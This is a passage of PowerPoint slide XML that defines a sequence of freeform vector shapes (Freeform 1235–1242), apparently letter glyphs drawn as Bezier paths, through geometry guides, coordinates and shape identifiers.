                <a:gd name="T29" fmla="*/ 37 h 219"/>
                <a:gd name="T30" fmla="*/ 91 w 240"/>
                <a:gd name="T31" fmla="*/ 200 h 219"/>
                <a:gd name="T32" fmla="*/ 120 w 240"/>
                <a:gd name="T33" fmla="*/ 219 h 219"/>
                <a:gd name="T34" fmla="*/ 150 w 240"/>
                <a:gd name="T35" fmla="*/ 200 h 219"/>
                <a:gd name="T36" fmla="*/ 204 w 240"/>
                <a:gd name="T37" fmla="*/ 37 h 219"/>
                <a:gd name="T38" fmla="*/ 216 w 240"/>
                <a:gd name="T39" fmla="*/ 37 h 219"/>
                <a:gd name="T40" fmla="*/ 240 w 240"/>
                <a:gd name="T41" fmla="*/ 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219">
                  <a:moveTo>
                    <a:pt x="240" y="19"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="0"/>
                    <a:pt x="226" y="0"/>
                    <a:pt x="216" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="0"/>
                    <a:pt x="136" y="1"/>
                    <a:pt x="136" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="37"/>
                    <a:pt x="150" y="37"/>
                    <a:pt x="159" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="37"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="37"/>
                    <a:pt x="104" y="37"/>
                    <a:pt x="104" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                    <a:pt x="81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4" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="219"/>
                    <a:pt x="109" y="219"/>
                    <a:pt x="120" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="219"/>
                    <a:pt x="144" y="219"/>
                    <a:pt x="150" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="204" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216" y="37"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="37"/>
                    <a:pt x="240" y="37"/>
                    <a:pt x="240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4" name="Freeform 1235">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EC9DDC9-A691-495D-9186-B180FD5F5511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5813425" y="1827213"/>
              <a:ext cx="90488" cy="85725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5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3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5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6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3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5" name="Freeform 1236">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B4E3549-3CA0-4A49-A718-0379E2700F46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5915025" y="1793875"/>
              <a:ext cx="79375" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 207"/>
                <a:gd name="T1" fmla="*/ 286 h 304"/>
                <a:gd name="T2" fmla="*/ 183 w 207"/>
                <a:gd name="T3" fmla="*/ 267 h 304"/>
                <a:gd name="T4" fmla="*/ 124 w 207"/>
                <a:gd name="T5" fmla="*/ 267 h 304"/>
                <a:gd name="T6" fmla="*/ 124 w 207"/>
                <a:gd name="T7" fmla="*/ 24 h 304"/>
                <a:gd name="T8" fmla="*/ 101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3 w 207"/>
                <a:gd name="T15" fmla="*/ 37 h 304"/>
                <a:gd name="T16" fmla="*/ 83 w 207"/>
                <a:gd name="T17" fmla="*/ 37 h 304"/>
                <a:gd name="T18" fmla="*/ 83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3 w 207"/>
                <a:gd name="T25" fmla="*/ 304 h 304"/>
                <a:gd name="T26" fmla="*/ 183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7"/>
                    <a:pt x="193" y="267"/>
                    <a:pt x="183" y="267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="124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83" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="267"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="267"/>
                    <a:pt x="0" y="267"/>
                    <a:pt x="0" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="15" y="304"/>
                    <a:pt x="23" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="183" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192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6" name="Freeform 1237">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA5A1AC2-D0F2-465B-A668-CA4D7CD0ADB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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6005512" y="1827213"/>
              <a:ext cx="96838" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 251 w 251"/>
                <a:gd name="T1" fmla="*/ 198 h 220"/>
                <a:gd name="T2" fmla="*/ 228 w 251"/>
                <a:gd name="T3" fmla="*/ 180 h 220"/>
                <a:gd name="T4" fmla="*/ 210 w 251"/>
                <a:gd name="T5" fmla="*/ 180 h 220"/>
                <a:gd name="T6" fmla="*/ 210 w 251"/>
                <a:gd name="T7" fmla="*/ 24 h 220"/>
                <a:gd name="T8" fmla="*/ 186 w 251"/>
                <a:gd name="T9" fmla="*/ 0 h 220"/>
                <a:gd name="T10" fmla="*/ 151 w 251"/>
                <a:gd name="T11" fmla="*/ 0 h 220"/>
                <a:gd name="T12" fmla="*/ 127 w 251"/>
                <a:gd name="T13" fmla="*/ 19 h 220"/>
                <a:gd name="T14" fmla="*/ 151 w 251"/>
                <a:gd name="T15" fmla="*/ 37 h 220"/>
                <a:gd name="T16" fmla="*/ 169 w 251"/>
                <a:gd name="T17" fmla="*/ 37 h 220"/>
                <a:gd name="T18" fmla="*/ 169 w 251"/>
                <a:gd name="T19" fmla="*/ 137 h 220"/>
                <a:gd name="T20" fmla="*/ 117 w 251"/>
                <a:gd name="T21" fmla="*/ 183 h 220"/>
                <a:gd name="T22" fmla="*/ 83 w 251"/>
                <a:gd name="T23" fmla="*/ 155 h 220"/>
                <a:gd name="T24" fmla="*/ 83 w 251"/>
                <a:gd name="T25" fmla="*/ 24 h 220"/>
                <a:gd name="T26" fmla="*/ 59 w 251"/>
                <a:gd name="T27" fmla="*/ 0 h 220"/>
                <a:gd name="T28" fmla="*/ 24 w 251"/>
                <a:gd name="T29" fmla="*/ 0 h 220"/>
                <a:gd name="T30" fmla="*/ 0 w 251"/>
                <a:gd name="T31" fmla="*/ 19 h 220"/>
                <a:gd name="T32" fmla="*/ 23 w 251"/>
                <a:gd name="T33" fmla="*/ 37 h 220"/>
                <a:gd name="T34" fmla="*/ 41 w 251"/>
                <a:gd name="T35" fmla="*/ 37 h 220"/>
                <a:gd name="T36" fmla="*/ 41 w 251"/>
                <a:gd name="T37" fmla="*/ 158 h 220"/>
                <a:gd name="T38" fmla="*/ 115 w 251"/>
                <a:gd name="T39" fmla="*/ 220 h 220"/>
                <a:gd name="T40" fmla="*/ 169 w 251"/>
                <a:gd name="T41" fmla="*/ 205 h 220"/>
                <a:gd name="T42" fmla="*/ 192 w 251"/>
                <a:gd name="T43" fmla="*/ 217 h 220"/>
                <a:gd name="T44" fmla="*/ 227 w 251"/>
                <a:gd name="T45" fmla="*/ 217 h 220"/>
                <a:gd name="T46" fmla="*/ 251 w 251"/>
                <a:gd name="T47" fmla="*/ 1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" h="220">
                  <a:moveTo>
                    <a:pt x="251" y="198"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="180"/>
                    <a:pt x="236" y="180"/>
                    <a:pt x="228" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="210" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="6"/>
                    <a:pt x="206" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="0"/>
                    <a:pt x="127" y="1"/>
                    <a:pt x="127" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="37"/>
                    <a:pt x="142" y="37"/>
                    <a:pt x="151" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="169" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="177"/>
                    <a:pt x="132" y="183"/>
                    <a:pt x="117" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="183"/>
                    <a:pt x="83" y="169"/>
                    <a:pt x="83" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="6"/>
                    <a:pt x="79" y="0"/>
                    <a:pt x="59" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24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1" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="207"/>
                    <a:pt x="77" y="220"/>
                    <a:pt x="115" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="220"/>
                    <a:pt x="152" y="216"/>
                    <a:pt x="169" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="217"/>
                    <a:pt x="182" y="217"/>
                    <a:pt x="192" y="217"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="227" y="217"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="217"/>
                    <a:pt x="251" y="217"/>
                    <a:pt x="251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7" name="Freeform 1238">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FEC4C1-2127-48CB-B7AD-0700B0170292}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId233"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6113462" y="1827213"/>
              <a:ext cx="79375" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 207"/>
                <a:gd name="T1" fmla="*/ 165 h 224"/>
                <a:gd name="T2" fmla="*/ 186 w 207"/>
                <a:gd name="T3" fmla="*/ 147 h 224"/>
                <a:gd name="T4" fmla="*/ 166 w 207"/>
                <a:gd name="T5" fmla="*/ 160 h 224"/>
                <a:gd name="T6" fmla="*/ 120 w 207"/>
                <a:gd name="T7" fmla="*/ 187 h 224"/>
                <a:gd name="T8" fmla="*/ 44 w 207"/>
                <a:gd name="T9" fmla="*/ 129 h 224"/>
                <a:gd name="T10" fmla="*/ 184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5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5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="148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7" y="183"/>
                    <a:pt x="132" y="187"/>
                    <a:pt x="120" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="187"/>
                    <a:pt x="53" y="165"/>
                    <a:pt x="44" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184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5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8" name="Freeform 1239">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C06348-3B72-4A80-A12B-9E4B7FF01C7A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6318250" y="1795463"/>
              <a:ext cx="73025" cy="117475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0 w 191"/>
                <a:gd name="T5" fmla="*/ 265 h 302"/>
                <a:gd name="T6" fmla="*/ 120 w 191"/>
                <a:gd name="T7" fmla="*/ 109 h 302"/>
                <a:gd name="T8" fmla="*/ 97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2 w 191"/>
                <a:gd name="T31" fmla="*/ 28 h 302"/>
                <a:gd name="T32" fmla="*/ 94 w 191"/>
                <a:gd name="T33" fmla="*/ 0 h 302"/>
                <a:gd name="T34" fmla="*/ 65 w 191"/>
                <a:gd name="T35" fmla="*/ 28 h 302"/>
                <a:gd name="T36" fmla="*/ 94 w 191"/>
                <a:gd name="T37" fmla="*/ 57 h 302"/>
                <a:gd name="T38" fmla="*/ 122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5"/>
                    <a:pt x="176" y="265"/>
                    <a:pt x="167" y="265"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="120" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="91"/>
                    <a:pt x="117" y="85"/>
                    <a:pt x="97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4" y="265"/>
                    <a:pt x="0" y="265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2" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="13"/>
                    <a:pt x="110" y="0"/>
                    <a:pt x="94" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="0"/>
                    <a:pt x="65" y="13"/>
                    <a:pt x="65" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="44"/>
                    <a:pt x="78" y="57"/>
                    <a:pt x="94" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="57"/>
                    <a:pt x="122" y="44"/>
                    <a:pt x="122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9" name="Freeform 1240">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0BAE0E-C86C-4660-BD5F-22EE4DD6BF36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6418262" y="1827213"/>
              <a:ext cx="74613" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 157 h 224"/>
                <a:gd name="T2" fmla="*/ 115 w 196"/>
                <a:gd name="T3" fmla="*/ 90 h 224"/>
                <a:gd name="T4" fmla="*/ 64 w 196"/>
                <a:gd name="T5" fmla="*/ 81 h 224"/>
                <a:gd name="T6" fmla="*/ 38 w 196"/>
                <a:gd name="T7" fmla="*/ 61 h 224"/>
                <a:gd name="T8" fmla="*/ 96 w 196"/>
                <a:gd name="T9" fmla="*/ 37 h 224"/>
                <a:gd name="T10" fmla="*/ 141 w 196"/>
                <a:gd name="T11" fmla="*/ 61 h 224"/>
                <a:gd name="T12" fmla="*/ 161 w 196"/>
                <a:gd name="T13" fmla="*/ 81 h 224"/>
                <a:gd name="T14" fmla="*/ 182 w 196"/>
                <a:gd name="T15" fmla="*/ 57 h 224"/>
                <a:gd name="T16" fmla="*/ 182 w 196"/>
                <a:gd name="T17" fmla="*/ 23 h 224"/>
                <a:gd name="T18" fmla="*/ 164 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 224"/>
                <a:gd name="T20" fmla="*/ 147 w 196"/>
                <a:gd name="T21" fmla="*/ 8 h 224"/>
                <a:gd name="T22" fmla="*/ 97 w 196"/>
                <a:gd name="T23" fmla="*/ 0 h 224"/>
                <a:gd name="T24" fmla="*/ 0 w 196"/>
                <a:gd name="T25" fmla="*/ 61 h 224"/>
                <a:gd name="T26" fmla="*/ 100 w 196"/>
                <a:gd name="T27" fmla="*/ 125 h 224"/>
                <a:gd name="T28" fmla="*/ 159 w 196"/>
                <a:gd name="T29" fmla="*/ 157 h 224"/>
                <a:gd name="T30" fmla="*/ 101 w 196"/>
                <a:gd name="T31" fmla="*/ 187 h 224"/>
                <a:gd name="T32" fmla="*/ 42 w 196"/>
                <a:gd name="T33" fmla="*/ 147 h 224"/>
                <a:gd name="T34" fmla="*/ 21 w 196"/>
                <a:gd name="T35" fmla="*/ 130 h 224"/>
                <a:gd name="T36" fmla="*/ 0 w 196"/>
                <a:gd name="T37" fmla="*/ 154 h 224"/>
                <a:gd name="T38" fmla="*/ 0 w 196"/>
                <a:gd name="T39" fmla="*/ 200 h 224"/>
                <a:gd name="T40" fmla="*/ 19 w 196"/>
                <a:gd name="T41" fmla="*/ 224 h 224"/>
                <a:gd name="T42" fmla="*/ 39 w 196"/>
                <a:gd name="T43" fmla="*/ 208 h 224"/>
                <a:gd name="T44" fmla="*/ 100 w 196"/>
                <a:gd name="T45" fmla="*/ 224 h 224"/>
                <a:gd name="T46" fmla="*/ 196 w 196"/>
                <a:gd name="T47" fmla="*/ 15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7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="104"/>
                    <a:pt x="131" y="92"/>
                    <a:pt x="115" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="78"/>
                    <a:pt x="38" y="72"/>
                    <a:pt x="38" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="49"/>
                    <a:pt x="53" y="37"/>
                    <a:pt x="96" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="37"/>
                    <a:pt x="139" y="49"/>
                    <a:pt x="141" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="71"/>
                    <a:pt x="143" y="81"/>
                    <a:pt x="161" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="81"/>
                    <a:pt x="182" y="69"/>
                    <a:pt x="182" y="57"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="182" y="23"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="14"/>
                    <a:pt x="181" y="0"/>
                    <a:pt x="164" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="0"/>
                    <a:pt x="149" y="4"/>
                    <a:pt x="147" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="106" y="0"/>
                    <a:pt x="97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3" y="118"/>
                    <a:pt x="100" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="128"/>
                    <a:pt x="159" y="134"/>
                    <a:pt x="159" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="173"/>
                    <a:pt x="142" y="187"/>
                    <a:pt x="101" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="187"/>
                    <a:pt x="54" y="182"/>
                    <a:pt x="42" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="136"/>
                    <a:pt x="37" y="130"/>
                    <a:pt x="21" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="130"/>
                    <a:pt x="0" y="142"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="1" y="224"/>
                    <a:pt x="19" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="224"/>
                    <a:pt x="32" y="224"/>
                    <a:pt x="39" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="223"/>
                    <a:pt x="87" y="224"/>
                    <a:pt x="100" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="224"/>
                    <a:pt x="196" y="181"/>
                    <a:pt x="196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0" name="Freeform 1241">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{102BD5C3-4501-4528-A7FE-75AB543AD14F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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6605587" y="1827213"/>
              <a:ext cx="98425" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 260 w 260"/>
                <a:gd name="T1" fmla="*/ 202 h 220"/>
                <a:gd name="T2" fmla="*/ 233 w 260"/>
                <a:gd name="T3" fmla="*/ 183 h 220"/>
                <a:gd name="T4" fmla="*/ 233 w 260"/>
                <a:gd name="T5" fmla="*/ 69 h 220"/>
                <a:gd name="T6" fmla="*/ 186 w 260"/>
                <a:gd name="T7" fmla="*/ 0 h 220"/>
                <a:gd name="T8" fmla="*/ 138 w 260"/>
                <a:gd name="T9" fmla="*/ 22 h 220"/>
                <a:gd name="T10" fmla="*/ 101 w 260"/>
                <a:gd name="T11" fmla="*/ 0 h 220"/>
                <a:gd name="T12" fmla="*/ 61 w 260"/>
                <a:gd name="T13" fmla="*/ 14 h 220"/>
                <a:gd name="T14" fmla="*/ 40 w 260"/>
                <a:gd name="T15" fmla="*/ 3 h 220"/>
                <a:gd name="T16" fmla="*/ 24 w 260"/>
                <a:gd name="T17" fmla="*/ 3 h 220"/>
                <a:gd name="T18" fmla="*/ 0 w 260"/>
                <a:gd name="T19" fmla="*/ 21 h 220"/>
                <a:gd name="T20" fmla="*/ 28 w 260"/>
                <a:gd name="T21" fmla="*/ 40 h 220"/>
                <a:gd name="T22" fmla="*/ 28 w 260"/>
                <a:gd name="T23" fmla="*/ 183 h 220"/>
                <a:gd name="T24" fmla="*/ 0 w 260"/>
                <a:gd name="T25" fmla="*/ 202 h 220"/>
                <a:gd name="T26" fmla="*/ 24 w 260"/>
                <a:gd name="T27" fmla="*/ 220 h 220"/>
                <a:gd name="T28" fmla="*/ 66 w 260"/>
                <a:gd name="T29" fmla="*/ 220 h 220"/>
                <a:gd name="T30" fmla="*/ 89 w 260"/>
                <a:gd name="T31" fmla="*/ 202 h 220"/>
                <a:gd name="T32" fmla="*/ 63 w 260"/>
                <a:gd name="T33" fmla="*/ 183 h 220"/>
                <a:gd name="T34" fmla="*/ 63 w 260"/>
                <a:gd name="T35" fmla="*/ 100 h 220"/>
                <a:gd name="T36" fmla="*/ 99 w 260"/>
                <a:gd name="T37" fmla="*/ 38 h 220"/>
                <a:gd name="T38" fmla="*/ 113 w 260"/>
                <a:gd name="T39" fmla="*/ 74 h 220"/>
                <a:gd name="T40" fmla="*/ 113 w 260"/>
                <a:gd name="T41" fmla="*/ 183 h 220"/>
                <a:gd name="T42" fmla="*/ 93 w 260"/>
                <a:gd name="T43" fmla="*/ 202 h 220"/>
                <a:gd name="T44" fmla="*/ 115 w 260"/>
                <a:gd name="T45" fmla="*/ 220 h 220"/>
                <a:gd name="T46" fmla="*/ 152 w 260"/>
                <a:gd name="T47" fmla="*/ 220 h 220"/>
                <a:gd name="T48" fmla="*/ 174 w 260"/>
                <a:gd name="T49" fmla="*/ 202 h 220"/>
                <a:gd name="T50" fmla="*/ 148 w 260"/>
                <a:gd name="T51" fmla="*/ 183 h 220"/>
                <a:gd name="T52" fmla="*/ 148 w 260"/>
                <a:gd name="T53" fmla="*/ 100 h 220"/>
                <a:gd name="T54" fmla="*/ 184 w 260"/>
                <a:gd name="T55" fmla="*/ 38 h 220"/>
                <a:gd name="T56" fmla="*/ 198 w 260"/>
                <a:gd name="T57" fmla="*/ 74 h 220"/>
                <a:gd name="T58" fmla="*/ 198 w 260"/>
                <a:gd name="T59" fmla="*/ 183 h 220"/>
                <a:gd name="T60" fmla="*/ 178 w 260"/>
                <a:gd name="T61" fmla="*/ 202 h 220"/>
                <a:gd name="T62" fmla="*/ 200 w 260"/>
                <a:gd name="T63" fmla="*/ 220 h 220"/>
                <a:gd name="T64" fmla="*/ 236 w 260"/>
                <a:gd name="T65" fmla="*/ 220 h 220"/>
                <a:gd name="T66" fmla="*/ 260 w 260"/>
                <a:gd name="T67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20">
                  <a:moveTo>
                    <a:pt x="260" y="202"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="185"/>
                    <a:pt x="251" y="183"/>
                    <a:pt x="233" y="183"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="233" y="69"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="59"/>
                    <a:pt x="232" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="0"/>
                    <a:pt x="153" y="6"/>
                    <a:pt x="138" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="8"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="101" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="0"/>
                    <a:pt x="73" y="5"/>
                    <a:pt x="61" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="3"/>
                    <a:pt x="48" y="3"/>
                    <a:pt x="40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38"/>
                    <a:pt x="10" y="40"/>
                    <a:pt x="28" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="183"/>
                    <a:pt x="0" y="185"/>
                    <a:pt x="0" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="220"/>
                    <a:pt x="16" y="220"/>
                    <a:pt x="24" y="220"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="220"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="220"/>
                    <a:pt x="89" y="220"/>
                    <a:pt x="89" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="185"/>
                    <a:pt x="81" y="183"/>
                    <a:pt x="63" y="183"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="100"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="60"/>
                    <a:pt x="80" y="38"/>
                    <a:pt x="99" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="38"/>
                    <a:pt x="113" y="46"/>
                    <a:pt x="113" y="74"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="113" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="183"/>
                    <a:pt x="93" y="186"/>
                    <a:pt x="93" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="220"/>
                    <a:pt x="107" y="220"/>
                    <a:pt x="115" y="220"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="220"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="220"/>
                    <a:pt x="174" y="220"/>
                    <a:pt x="174" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="185"/>
                    <a:pt x="166" y="183"/>
                    <a:pt x="148" y="183"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148" y="100"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="60"/>
                    <a:pt x="165" y="38"/>
                    <a:pt x="184" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="38"/>
                    <a:pt x="198" y="46"/>
                    <a:pt x="198" y="74"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="183"/>
                    <a:pt x="178" y="186"/>
                    <a:pt x="178" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="220"/>
                    <a:pt x="192" y="220"/>
                    <a:pt x="200" y="220"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="236" y="220"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="220"/>
                    <a:pt x="260" y="220"/>
                    <a:pt x="26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1" name="Freeform 1242">
              <a:extLst>
